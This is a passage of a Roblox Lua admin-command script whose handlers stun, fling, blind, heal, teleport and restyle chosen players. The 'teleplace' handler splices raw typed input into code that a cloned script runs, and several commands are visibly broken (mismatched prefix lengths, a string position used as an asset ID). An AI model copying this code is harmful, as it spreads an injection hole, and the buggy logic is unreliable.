  1255. end
  1256.  
  1257. if Cmd.Text:lower():sub(1,5) == "stun " then
  1258. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1259. for i, v in pairs(plrz) do
  1260. coroutine.resume(coroutine.create(function()
  1261. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1262. v.Character.Humanoid.PlatformStand = true
  1263. end
  1264. end))
  1265. end
  1266. end
  1267.  
  1268. if Cmd.Text:lower():sub(1,7) == "unstun " then
  1269. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1270. for i, v in pairs(plrz) do
  1271. coroutine.resume(coroutine.create(function()
  1272. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1273. v.Character.Humanoid.PlatformStand = false
  1274. end
  1275. end))
  1276. end
  1277. end
  1278.  
  1279. if Cmd.Text:lower():sub(1,5) == "jump " then
  1280. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1281. for i, v in pairs(plrz) do
  1282. coroutine.resume(coroutine.create(function()
  1283. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1284. v.Character.Humanoid.Jump = true
  1285. end
  1286. end))
  1287. end
  1288. end
  1289.  
  1290. if Cmd.Text:lower():sub(1,4) == "sit " then
  1291. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1292. for i, v in pairs(plrz) do
  1293. coroutine.resume(coroutine.create(function()
  1294. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1295. v.Character.Humanoid.Sit = true
  1296. end
  1297. end))
  1298. end
  1299. end
  1300.  
  1301. if Cmd.Text:lower():sub(1,10) == "invisible " then
  1302. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1303. for i, v in pairs(plrz) do
  1304. coroutine.resume(coroutine.create(function()
  1305. if v and v.Character then
  1306. for a, obj in pairs(v.Character:children()) do
  1307. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1308. end
  1309. end
  1310. end))
  1311. end
  1312. end
  1313.  
  1314. if Cmd.Text:lower():sub(1,8) == "visible " then
  1315. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1316. for i, v in pairs(plrz) do
  1317. coroutine.resume(coroutine.create(function()
  1318. if v and v.Character then
  1319. for a, obj in pairs(v.Character:children()) do
  1320. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1321. end
  1322. end
  1323. end))
  1324. end
  1325. end
  1326.  
  1327.  
  1328.  
  1329. if Cmd.Text:lower():sub(1,5) == "fire " then
  1330. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1331. for i, v in pairs(plrz) do
  1332. coroutine.resume(coroutine.create(function()
  1333. if v and v.Character and v.Character:findFirstChild("Torso") then
  1334. local cl = Instance.new("Fire", v.Character.Torso)
  1335. end
  1336. end))
  1337. end
  1338. end
  1339.  
  1340. if Cmd.Text:lower():sub(1,7) == "unfire " then
  1341. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1342. for i, v in pairs(plrz) do
  1343. coroutine.resume(coroutine.create(function()
  1344. if v and v.Character and v.Character:findFirstChild("Torso") then
  1345. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1346. end
  1347. end))
  1348. end
  1349. end
  1350.  
  1351. if Cmd.Text:lower():sub(1,6) == "smoke " then
  1352. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1353. for i, v in pairs(plrz) do
  1354. coroutine.resume(coroutine.create(function()
  1355. if v and v.Character and v.Character:findFirstChild("Torso") then
  1356. local cl = Instance.new("Smoke", v.Character.Torso)
  1357. end
  1358. end))
  1359. end
  1360. end
  1361.  
  1362. if Cmd.Text:lower():sub(1,8) == "unsmoke " then
  1363. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1364. for i, v in pairs(plrz) do
  1365. coroutine.resume(coroutine.create(function()
  1366. if v and v.Character and v.Character:findFirstChild("Torso") then
  1367. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1368. end
  1369. end))
  1370. end
  1371. end
  1372.  
  1373. if Cmd.Text:lower():sub(1,9) == "sparkles " then
  1374. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1375. for i, v in pairs(plrz) do
  1376. coroutine.resume(coroutine.create(function()
  1377. if v and v.Character and v.Character:findFirstChild("Torso") then
  1378. local cl = Instance.new("Sparkles", v.Character.Torso)
  1379. end
  1380. end))
  1381. end
  1382. end
  1383.  
  1384. if Cmd.Text:lower():sub(1,11) == "unsparkles " then
  1385. local plrz = GetPlr(plr, Cmd.Text:lower():sub(12))
  1386. for i, v in pairs(plrz) do
  1387. coroutine.resume(coroutine.create(function()
  1388. if v and v.Character and v.Character:findFirstChild("Torso") then
  1389. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1390. end
  1391. end))
  1392. end
  1393. end
  1394.  
  1395. if Cmd.Text:lower():sub(1,3) == "ff " then
  1396. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4))
  1397. for i, v in pairs(plrz) do
  1398. coroutine.resume(coroutine.create(function()
  1399. if v and v.Character then Instance.new("ForceField", v.Character) end
  1400. end))
  1401. end
  1402. end
  1403.  
  1404. if Cmd.Text:lower():sub(1,5) == "unff " then
  1405. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1406. for i, v in pairs(plrz) do
  1407. coroutine.resume(coroutine.create(function()
  1408. if v and v.Character then
  1409. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1410. end
  1411. end))
  1412. end
  1413. end
  1414.  
  1415. if Cmd.Text:lower():sub(1,7) == "freeze " then
  1416. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1417. for i, v in pairs(plrz) do
  1418. coroutine.resume(coroutine.create(function()
  1419. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1420. for a, obj in pairs(v.Character:children()) do
  1421. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1422. end
  1423. end
  1424. end))
  1425. end
  1426. end
  1427.  
  1428. if Cmd.Text:lower():sub(1,5) == "thaw " then
  1429. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1430. for i, v in pairs(plrz) do
  1431. coroutine.resume(coroutine.create(function()
  1432. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1433. for a, obj in pairs(v.Character:children()) do
  1434. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1435. end
  1436. end
  1437. end))
  1438. end
  1439. end
  1440.  
  1441.  
  1442.  
  1443. if Cmd.Text:lower():sub(1,4) == "god " then
  1444. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1445. for i, v in pairs(plrz) do
  1446. coroutine.resume(coroutine.create(function()
  1447. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1448. v.Character.Humanoid.MaxHealth = math.huge
  1449. v.Character.Humanoid.Health = 9e9
  1450. end
  1451. end))
  1452. end
  1453. end
  1454.  
  1455. if Cmd.Text:lower():sub(1,6) == "ungod " then
  1456. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1457. for i, v in pairs(plrz) do
  1458. coroutine.resume(coroutine.create(function()
  1459. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1460. v.Character.Humanoid.MaxHealth = 100
  1461. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1462. end
  1463. end))
  1464. end
  1465. end
  1466.  
  1467. if Cmd.Text:lower():sub(1,8) == "ambient " then
  1468. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1469. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1470. game.Lighting.Ambient = Color3.new(Cmd.Text:sub(9,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1471. end
  1472.  
  1473. if Cmd.Text:lower():sub(1,11) == "brightness " then
  1474. game.Lighting.Brightness = Cmd.Text:sub(12)
  1475. end
  1476.  
  1477. if Cmd.Text:lower():sub(1,5) == "time " then
  1478. game.Lighting.TimeOfDay = Cmd.Text:sub(6)
  1479. end
  1480.  
  1481. if Cmd.Text:lower():sub(1,9) == "fogcolor " then
  1482. local chk1 = Cmd.Text:lower():sub(10):find(" ") + 9
  1483. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1484. game.Lighting.FogColor = Color3.new(Cmd.Text:sub(10,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1485. end
  1486.  
  1487. if Cmd.Text:lower():sub(1,7) == "fogend " then
  1488. game.Lighting.FogEnd = Cmd.Text:sub(8)
  1489. end
  1490.  
  1491. if Cmd.Text:lower():sub(1,9) == "fogstart " then
  1492. game.Lighting.FogStart = Cmd.Text:sub(10)
  1493. end
  1494.  
  1495.  
  1496.  
  1497. if Cmd.Text:lower():sub(1,12) == "rtools " then
  1498. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1499. for i, v in pairs(plrz) do
  1500. coroutine.resume(coroutine.create(function()
  1501. if v and v.Character and v:findFirstChild("Backpack") then
  1502. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1503. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1504. end
  1505. end))
  1506. end
  1507. end
  1508.  
  1509.  
  1510.  
  1511.  
  1512.  
  1513.  
  1514.  
  1515. if Cmd.Text:lower():sub(1,8) == "shealth " then
  1516. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1517. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9,chk1-1))
  1518. for i, v in pairs(plrz) do
  1519. coroutine.resume(coroutine.create(function()
  1520. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1521. v.Character.Humanoid.MaxHealth = Cmd.Text:sub(chk1+1)
  1522. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1523. end
  1524. end))
  1525. end
  1526. end
  1527.  
  1528. if Cmd.Text:lower():sub(1,6) == "speed " then
  1529. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1530. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1531. for i, v in pairs(plrz) do
  1532. coroutine.resume(coroutine.create(function()
  1533. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1534. v.Character.Humanoid.WalkSpeed = Cmd.Text:sub(chk1+1)
  1535. end
  1536. end))
  1537. end
  1538. end
  1539.  
  1540.  
  1541. if Cmd.Text:lower():sub(1,10) == "teleplace " then
  1542. local chk1 = Cmd.Text:lower():sub(11):find(" ") + 10
  1543. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11,chk1-1))
  1544. for i, v in pairs(plrz) do
  1545. coroutine.resume(coroutine.create(function()
  1546. if v and v:findFirstChild("PlayerGui") then
  1547. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. Cmd.Text:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1548. end
  1549. end))
  1550. end
  1551. end
  1552.  
  1553. if Cmd.Text:lower():sub(1,3) == "tp " then
  1554. local chk1 = Cmd.Text:lower():sub(4):find(" ") + 3
  1555. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4,chk1-1))
  1556. local plrz2 = GetPlr(plr, Cmd.Text:lower():sub(chk1+1))
  1557. for i, v in pairs(plrz) do
  1558. coroutine.resume(coroutine.create(function()
  1559. for i2, v2 in pairs(plrz2) do
  1560. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  1561. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1562. end
  1563. end
  1564. end))
  1565. end
  1566. end
  1567.  
  1568. if Cmd.Text:lower():sub(1,7) == "statchange " then
  1569. local chk1 = Cmd.Text:lower():sub(8):find(" ") + 7
  1570. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1571. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8,chk1-1))
  1572. for i, v in pairs(plrz) do
  1573. coroutine.resume(coroutine.create(function()
  1574. if v and v:findFirstChild("leaderstats") then
  1575. for a, st in pairs(v.leaderstats:children()) do
  1576. if st.Name:lower():find(Cmd.Text:sub(chk1+1,chk2-1)) == 1 then st.Value = Cmd.Text:sub(chk2+1) end
  1577. end
  1578. end
  1579. end))
  1580. end
  1581. end
  1582.  
  1583. if Cmd.Text:lower():sub(1,6) == "shirt " then
  1584. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1585. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1586. for i, v in pairs(plrz) do
  1587. coroutine.resume(coroutine.create(function()
  1588. if v and v.Character then
  1589. for i,v in pairs(v.Character:children()) do
  1590. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1591. end
  1592. end
  1593. end))
  1594. end
  1595. end
  1596.  
  1597. if Cmd.Text:lower():sub(1,6) == "pants " then
  1598. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1599. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1600. for i, v in pairs(plrz) do
  1601. coroutine.resume(coroutine.create(function()
  1602. if v and v.Character then
  1603. for i,v in pairs(v.Character:children()) do
  1604. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1605. end
  1606. end
  1607. end))
  1608. end
  1609. end
  1610.  
  1611. if Cmd.Text:lower():sub(1,5) == "gear " then
  1612. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1613. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6, chk1-1))
  1614. for i, v in pairs(plrz) do
  1615. if Cmd.Text:lower():sub(6) == "all" then return end
  1616. if Cmd.Text:lower():sub(6) == "others"then return end
  1617. if Cmd.Text:lower():sub(6) == "nonadmins" then return end
  1618. coroutine.resume(coroutine.create(function()
  1619. if v and v:findFirstChild("Backpack") then
  1620. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1621. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1622. obj:Destroy()
  1623. end
  1624. end))
  1625. end
  1626. end
  1627.  
  1628. if Cmd.Text:lower():sub(1,5) == "face " then
  1629. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1630. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1631. for i, v in pairs(plrz) do
  1632. coroutine.resume(coroutine.create(function()
  1633. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1634. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1635. end
  1636. end))
  1637. end
  1638. end
  1639.  
  1640.  
  1641.  
  1642.  
  1643.  
  1644.  
  1645. if Cmd.Text:lower():sub(1,6) == "music " then
  1646. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1647. local id = Cmd.Text:sub(7)
  1648. local pitch = 1
  1649. if tostring(id):lower():find("caramell") then id = 2303479 end
  1650. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1651. if tostring(id):find("rick") then id = 2027611 end
  1652. if tostring(id):find("halo") then id = 1034065 end
  1653. if tostring(id):find("pokemon") then id = 1372261 end
  1654. if tostring(id):find("cursed") then id = 1372257 end
  1655. if tostring(id):find("extreme") then id = 11420933 end
  1656. if tostring(id):find("awaken") then id = 27697277 end
  1657. if tostring(id):find("alone") then id = 27697392 end
  1658. if tostring(id):find("mario") then id = 1280470 end
  1659. if tostring(id):find("choir") then id = 1372258 end
  1660. if tostring(id):find("chrono") then id = 1280463 end
  1661. if tostring(id):find("dotr") then id = 11420922 end
  1662. if tostring(id):find("entertain") then id = 27697267 end
  1663. if tostring(id):find("fantasy") then id = 1280473 end
  1664. if tostring(id):find("final") then id = 1280414 end
  1665. if tostring(id):find("emblem") then id = 1372259 end
  1666. if tostring(id):find("flight") then id = 27697719 end
  1667. if tostring(id):find("banjo") then id = 27697298 end
  1668. if tostring(id):find("gothic") then id = 27697743 end
  1669. if tostring(id):find("hiphop") then id = 27697735 end
  1670. if tostring(id):find("intro") then id = 27697707 end
  1671. if tostring(id):find("mule") then id = 1077604 end
  1672. if tostring(id):find("film") then id = 27697713 end
  1673. if tostring(id):find("nezz") then id = 8610025 end
  1674. if tostring(id):find("angel") then id = 1372260 end
  1675. if tostring(id):find("resist") then id = 27697234 end
  1676. if tostring(id):find("schala") then id = 5985787 end
  1677. if tostring(id):find("organ") then id = 11231513 end
  1678. if tostring(id):find("tunnel") then id = 9650822 end
  1679. if tostring(id):find("spanish") then id = 5982975 end
  1680. if tostring(id):find("venom") then id = 1372262 end
  1681. if tostring(id):find("wind") then id = 1015394 end
  1682. if tostring(id):find("guitar") then id = 5986151 end
  1683. if tostring(id):find("fox") then id = 130797915 end
  1684. if tostring(id):find("gangnam") then id = 130844430 end
  1685. if tostring(id):find("nyan") then id = 130786686 end
  1686. if tostring(id):find("harlem") then id = 131154740 end
  1687. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  1688. end
  1689.  
  1690. if Cmd.Text:lower() == "stopmusic" then
  1691. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1692. end
  1693.  
  1694. if Cmd.Text:lower() == "musiclist" then
  1695. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1696. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1697. local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","Harlem","Nyan","Fox","Gangnam","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1698. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1699. end
  1700.  
  1701.  
  1702. if Cmd.Text:lower():sub(1,5) == "spin " then
  1703. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1704. for i, v in pairs(plrz) do
  1705. coroutine.resume(coroutine.create(function()
  1706. if v and v.Character and v.Character:findFirstChild("Torso") then
  1707. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1708. local torso = v.Character:findFirstChild("Torso")
  1709. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1710. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1711. until not bg or bg.Parent ~= torso
  1712. end
  1713. end))
  1714. end
  1715. end
  1716.  
  1717. if Cmd.Text:lower():sub(1,7) == "unspin " then
  1718. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1719. for i, v in pairs(plrz) do
  1720. coroutine.resume(coroutine.create(function()
  1721. if v and v.Character and v.Character:findFirstChild("Torso") then
  1722. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1723. end
  1724. end))
  1725. end
  1726. end
  1727.  
  1728.  
  1729.  
  1730. if Cmd.Text:lower():sub(1,8) == "bighead " then
  1731. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1732. for i, v in pairs(plrz) do
  1733. coroutine.resume(coroutine.create(function()
  1734. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1735. end))
  1736. end
  1737. end
  1738.  
  1739. if Cmd.Text:lower():sub(1,9) == "minihead " then
  1740. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1741. for i, v in pairs(plrz) do
  1742. coroutine.resume(coroutine.create(function()
  1743. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1744. end))
  1745. end
  1746. end
  1747.  
  1748. if Cmd.Text:lower():sub(1,6) == "fling " then
  1749. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1750. for i, v in pairs(plrz) do
  1751. coroutine.resume(coroutine.create(function()
  1752. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1753. local xran local zran
  1754. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1755. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1756. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1757. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1758. end
  1759. end))
  1760. end
  1761. end
  1762.  
  1763. if Cmd.Text:lower():sub(1,8) == "seizure " then
  1764. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1765. for i, v in pairs(plrz) do
  1766. coroutine.resume(coroutine.create(function()
  1767. if v and v.Character then
  1768. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1769. end
  1770. end))
  1771. end
  1772. end
  1773.  
  1774. if Cmd.Text:lower():sub(1,10) == "unseizure " then
  1775. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1776. for i, v in pairs(plrz) do
  1777. coroutine.resume(coroutine.create(function()
  1778. if v and v.Character then
  1779. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1780. wait(.1) v.Character.Humanoid.PlatformStand = false
  1781. end
  1782. end))
  1783. end
  1784. end
  1785.  
  1786. if Cmd.Text:lower():sub(1,12) == "rlimbs " then
  1787. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1788. for i, v in pairs(plrz) do
  1789. coroutine.resume(coroutine.create(function()
  1790. if v and v.Character then
  1791. for a, obj in pairs(v.Character:children()) do
  1792. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1793. end
  1794. end
  1795. end))
  1796. end
  1797. end
  1798.  
  1799.  
  1800. if Cmd.Text:lower():sub(1,5) == "char " then
  1801. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1802. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1803. for i, v in pairs(plrz) do
  1804. coroutine.resume(coroutine.create(function()
  1805. if v and v.Character then
  1806. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. Cmd.Text:sub(chk1+1)
  1807. v:LoadCharacter()
  1808. end
  1809. end))
  1810. end
  1811. end
  1812.  
  1813. if Cmd.Text:lower():sub(1,7) == "unchar " then
  1814. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1815. for i, v in pairs(plrz) do
  1816. coroutine.resume(coroutine.create(function()
  1817. if v and v.Character then
  1818. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1819. v:LoadCharacter()
  1820. end
  1821. end))
  1822. end
  1823. end
  1824.  
  1825.  
  1826.  
  1827. if Cmd.Text:lower():sub(1,7) == "normal " then
  1828. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1829. for i, v in pairs(plrz) do
  1830. coroutine.resume(coroutine.create(function()
  1831. if v and v.Character and v.Character:findFirstChild("Torso") then
  1832. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1833. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1834. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1835. v.Character.Torso.Transparency = 0
  1836. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1837. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1838. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1839. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1840. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1841. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1842. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1843. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1844. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1845. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  1846. end end
  1847. end
  1848. end))
  1849. end
  1850. end
  1851.  
  1852. if Cmd.Text:lower():sub(1,7) == "trippy " then
  1853. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1854. for i, v in pairs(plrz) do
  1855. coroutine.resume(coroutine.create(function()
  1856. if v and v:findFirstChild("PlayerGui")then
  1857. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1858. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1859. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1860. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  1861. end
  1862. end))
  1863. end
  1864. end
  1865.  
  1866. if Cmd.Text:lower():sub(1,9) == "untrippy " then
  1867. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1868. for i, v in pairs(plrz) do
  1869. coroutine.resume(coroutine.create(function()
  1870. if v and v:findFirstChild("PlayerGui") then
  1871. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1872. end
  1873. end))
  1874. end
  1875. end
  1876.  
  1877.  
  1878. if Cmd.Text:lower():sub(1,6) == "blind " then
  1879. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1880. for i, v in pairs(plrz) do
  1881. coroutine.resume(coroutine.create(function()
  1882. if v and v:findFirstChild("PlayerGui") then
  1883. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1884. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1885. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1886. end
  1887. end))
  1888. end
  1889. end
  1890.  
  1891. if Cmd.Text:lower():sub(1,8) == "unblind " then
  1892. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1893. for i, v in pairs(plrz) do
  1894. coroutine.resume(coroutine.create(function()
  1895. if v and v:findFirstChild("PlayerGui") then
  1896. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1897. end
  1898. end))
  1899. end
  1900. end
  1901.  
  1902. if Cmd.Text:lower():sub(1,7) == "guifix " then
  1903. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1904. for i, v in pairs(plrz) do
  1905. coroutine.resume(coroutine.create(function()
  1906. if v and v:findFirstChild("PlayerGui") then
  1907. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1908. end
  1909. end))
  1910. end
  1911. end
  1912.  
  1913. if Cmd.Text:lower():sub(1,9) == "loopheal " then
  1914. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1915. for i, v in pairs(plrz) do
  1916. if v then
  1917. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1918. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1919. repeat wait()
  1920. coroutine.resume(coroutine.create(function()
